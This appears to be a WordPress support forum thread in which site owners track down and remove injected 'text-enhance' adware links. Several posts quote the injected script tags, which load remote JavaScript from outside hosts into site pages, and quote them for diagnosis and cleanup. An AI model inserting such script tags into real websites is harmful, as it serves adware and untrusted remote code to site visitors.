wordpress plugin showing text-enhance links? (25 posts)

  1. deltaskelta
    Posted 3 years ago #

    I had text inhance get into my FF on my windows machine in the past, and I removed it by removing the add-on...

    Now on my linux machine, it is showing text-enhance links, and it only goes away when I disable shockwave FF extension, because it uses shockwave to display the links I guess.

    I downloaded a brand new install of chrome and it shows the links with no extensions or addons, which makes me think it has to be coming directly from my site via a plugin or something, or maybe it was hacked?

    my site is http://www.radbrains.com any help would be appreciated...

  2. deltaskelta
    Posted 3 years ago #

    also another reason why I think it is coming from somewhere within mt wordpress site is that last time it hapenned, it was on my phpbb powered forum too.

    This time my forum is unaffected, and the links only appear on the main site.

  3. deltaskelta
    Posted 3 years ago #

    Ok it is now on all browsers on my windows machine as well. Note that I have not installed anything new on the machines at all. It has to be coming from inside wordpress somewhere, but how do I chase it down?

  4. Rev. Voodoo
    Posted 3 years ago #

    I cruised around your site - I see no links, other than ones you put there (internal, obvious links)

    However, looking at your source code - you have various credit links in there - you may have hidden them, or they may be hidden from you. If you have inserted spam in your footer, it makes me question where you got the theme from?

    If you have a shady theme, it could be inserting all sorts of garbage

  5. deltaskelta
    Posted 3 years ago #

    ok, I have just tried changing the theme to completely legitimate ones which came with wordpress and ones that were downloaded direct from wordpress themes. They both are still showing the text enhance links for me.

    I have also confirmed the text enhance links on another windows machine, a clean install on another linux machine, and booting from the linux CD (IE factory fresh no possible tampering OS) and all of them are showing the text enhance links. So 4 machines, and one CD bootable clean OS.

    Problem lies with template: nope, have tried many different legitimate templates

    Problem lies with machine: next to impossible, have tried 4 different machines, and clean OS's

    I am pretty sure the problem is coming from a WP plugin from a recent update, will test around and get back. In the meantime anyone with any input on this?

  6. deltaskelta
    Posted 3 years ago #

    no luck. I am running out of ideas, I don't know why all my machines would be showing it

  7. Rev. Voodoo
    Posted 3 years ago #

    I'm not seeing the links unfortunately - maybe someone else can see them... I just revisited your site, still nothing

    I didn't even see anything in your source really, other than the hidden footer links I previously mentioned - those wouldn't specifically cause your problem.

    The only thing I see that I can't account for in your source is this... do you know what it is?

    <p><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script></p>

    It shows up in your Why Trade Price Action post, after the content but before the 'read more' in your source code

    I can't see it outputting anything into your page - and it's not on every post - that's why I was wondering if you put it in that post?

  8. deltaskelta
    Posted 3 years ago #

    thanks for the reply.

    No I do not know what that is, and i definitely did not put it in there.

    I went to the html part of that post and could not find it in the wordpress backend, which menas something else is putting it in there...

    How can I go about telling what this is and possibly removing it if I have no idea where it is coming from?

  9. deltaskelta
    Posted 3 years ago #

    UPDATE: talking to my host support, they saw the links as well, and they are looking into the issue for now. Will update if I get more information

  10. Rev. Voodoo
    Posted 3 years ago #

    Well, I'm glad we could point you in the right direction, at least.

    It is very hard, for me only being able to see your source code, to know where any of that comes from.

    Maybe a plugin, maybe a theme.... but I'd start to get suspicious of a hacked install - in which case:

    You need to start working your way through these resources:

    Additional Resources:

    Hopefully that can help you out! Although:
    Your site is coming up clean at the moment - have you figured out the problem?

  11. deltaskelta
    Posted 3 years ago #

    I have not figured out the problem, and it has actually gotten worse. I never looked anywhere but the main page of my site, and I just recently tried to click a category and noticed it led me to a 404. Every internal link on the site I have clicked has led me to a 404.

    I guess that would explain the drop-off in traffic I have seen.

    My god I just want to solve this, but I now have no clue what to do, my host will not do anything about it. I have deleted all of my templates and that has not helped.

    I am thinking about doing a new clean WP install and reusing my DB and media folder. That should solve the problem right? Is this easy to do?

  12. deltaskelta
    Posted 3 years ago #

    I am fairly certain it is coming from these scripts:


    but I have no way of tracking it down

  13. I have not figured out the problem, and it has actually gotten worse.

    Have you checked your site to see if you're hacked as the right Rev. Voodoo suggested? If it's not a plugin, not your theme, you've likely been hacked.

  14. deltaskelta
    Posted 3 years ago #

    I think it is probably a theme or a plugin that made a change to the DB and then stayed once it was deactivated. I had downloaded a lot of themes from different places to try them out without knowing the dangers. Now they are all deleted.

    I did have a small victory, I searched the DB and found the above mentioned code in the posts table, and deleted it. I do not know why it was not showing up in WP backend. This did remove the ads, but I am still left with the 404 problem.

    I did check the websites above and I did some snooping in my DB and filesystem and didn't find anything unusual, although I may have missed something unknowingly. I did clean up all unneeded DB tables, all unneeded plugins, and templates. I also checked the uploads folder and the wp-config for anything suspicious and again didn't find anything.

    I did, however notice that my .htaccess file was renamed to .htaccess123 but I do not know if this is something my host has done while they were looking at my site or if this may be the cause of the problem.

    Thanks for your help, what would cause 404's like that when the data clearly still exists?

  15. deltaskelta
    Posted 3 years ago #

    renaming the .htaccess file fixed the problem. I am sure it must have been my host who renamed it while troubleshooting for some reason, maybe to see if the source of the problem was there, renaming to see if it solved the problem...and then like a noob he left it renamed.

    Anyway all seems to be going well for now, I hope it stays fixed.

  16. deltaskelta
    Posted 3 years ago #

    htaccess123 was the problem, I suspect it was some tech guy at my host who renamed it to see if that was the source of the problem and then never "un-named" it back to just .htaccess.

    At least now everything seems to be working, and it was actually really simple to fix in the DB, but I had just never messed around with databases before so it was a little unnerving.

    I hope I have caught everything and it all goes smoothly from here.

    Edit: It could have been any number of themes I had installed, but the theme that I really want to use is called newslayer from FThemes.com. Is that website reputable enough to use themes from?

  17. wprelief
    Posted 3 years ago #

    Hey guys, I just fixed a client's site with this problem.
    After wasting HOURS searching the code I finally searched the database and found the JS being inserted into the Post at the bottom. Going to the "Edit Post" page for that, sure enough, showed the code at the bottom of the post!

    I had the client follow all the awesome instructions here (full-disclosure: not my instructions): http://botcrawl.com/how-to-remove-text-enhance/

    Then I edited ALL the posts that were showing weird links and deleted the JS showing up at the bottom (this must be done from the HTML tab).

    Note: This was the JS that was being embedded on Save:


    That has fixed the problem for a week now. This is quite an example of a browser bot getting into a website! The client said he was seeing the JS added upon 'Save' of new posts.

    Good luck!
    -Spotted Koi

  18. tx12rh
    Posted 3 years ago #

    Totally agree with Spotted Koi's post above. After a week of research and pulling my hair out, I found the same code when I looked at the html on the published pages that were affected (ctrl + u).
    1. I removed all of the plugins I thought could have been the problem, so it wouldn't keep republishing the script
    2. I removed this script from the html of each page (by going to the edit feature in wordpress, clicking on each page, and then clicking the tab that says html vs. visual above the text). It was at the bottom of each of my pages.

    <script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

    This fixed the problem instantly. So, in regards to the email from text-enhance that is it a browser issue, that was totally NOT true in our case.

    I did however, learn to lock down my site better, which was a bonus in this whole time wasting ordeal. I found a lot of good info on that here: http://codex.wordpress.org/Hardening_WordPress Good luck!

  19. Rev. Voodoo
    Posted 3 years ago #

    @deltaskelta - I just noticed your followup, My opinion is NO, FThemes is not reputable and I would not touch their free themes. My basis:

    Themes Ownership and Sponsored Links
    You may not claim intellectual or exclusive ownership to any of our products, modified or unmodified. FThemes.com reserves the rights to:

    •Offer to its users paid and links free versions of the themes, released as free and contain sponsored links.
    •Remove any link, which is not family friendly and link or redirect to: gambling, casino, poker, adult, pharmacy or any other illegal stuffs sites.

    This is telling you that they are inserting links into your themes. I didn't download any of their themes to check exactly what they are doing and if they could be the cause of your original issue... but that disclaimer they provide is enough for me to stay away!

    EDIT - I decided to dig deeper and download a theme, there is encrypted garbage in there, links, checks to make sure you don't edit the theme, etc. I wouldn't touch their free themes.

    // Just my 2 cents!

  20. esmi
    Forum Moderator
    Posted 3 years ago #

    I'd also suggest reading this article on downloading themes. Fthemes is one of the theme sites referenced in it.

  21. Rev. Voodoo
    Posted 3 years ago #

    Forgot about that article, thanks!

  22. WayneM1
    Posted 3 years ago #

    wprelief aka Spotted Koi and tx12rh are on the right track here.

    This is definitely an issue with the WordPress user's computer. It's seems that this is some kind of a browser add-on/extension exploit. The WP user (could be you, or any WP user with editing rights - like a client's website if you are a developer) has an infected computer that injects this crap into anything they edit.

    If you do a search of your WP database(s) using PHPmyAdmin, you'll no doubt find some remnants of that injected crap floating around in various saved drafts and previous versions of many pages/posts.

    This is good news and bad:
    Good - is that it should be a localized problem (on someone's computer - not on your websever files or database)
    Bad - Still need to track down where this exploit is coming from. Need to clean up your own computer (fix the browser problem, run a virus scan). Need to contact your client(s) and tell them to clean their computer. Need to remind everyone to keep their stuff clean and secure with proper virus protection (actually do the scans), with vigilance to not just download and install any crapware that you think is going to be fun, or helpful. Etc, etc, etc.

    In the mean time... I would really appreciate any specific leads regarding what browser add-ons/extensions and/or other malware is responsible for this outbreak so it can be squashed.


  23. yazuworks
    Posted 3 years ago #

    <script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

    Removing that code solved my issue. It was inserted in a lot of places, so I used a database replacer and it grabbed a whole bunch of instances. It's gone on all machines I visit the site from now. Hope that helps other people.

  24. Pedro
    Posted 3 years ago #

    Hey guys,

    Here's a potential FireFox extension to cause this crap, it's called VideoFileDownload:


    I hope this helps some of you to avoid the code to appear again on your sites.

    Stay safe!

  25. Rlamothe
    Posted 3 years ago #

    Hey Guys.. I spent a few days driving myself crazy over Text enhance on my WP sites... Until I stopped thinking it was a major problem and started thinking smaller. For me it was two plugins, BlackStudio Tiny MCE and Testimonials plugin... Here's what you do...

    Deactivate all of your plugins. One by one, turn them on and refresh your site until you see the ads popup again.. now you have isolated the plugin.

    Check each page to see if the code is there. You may still find it on a few pages, however, when you go to 'edit' that particular page, the code you are looking for will now be visible in the html editor. (Typically at the bottom.) Simply delete the script and update the page.... Boom! All gone!

    This is the code that was on my site:

    <script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Topic Closed

This topic has been closed to new replies.

About this Topic


No tags yet.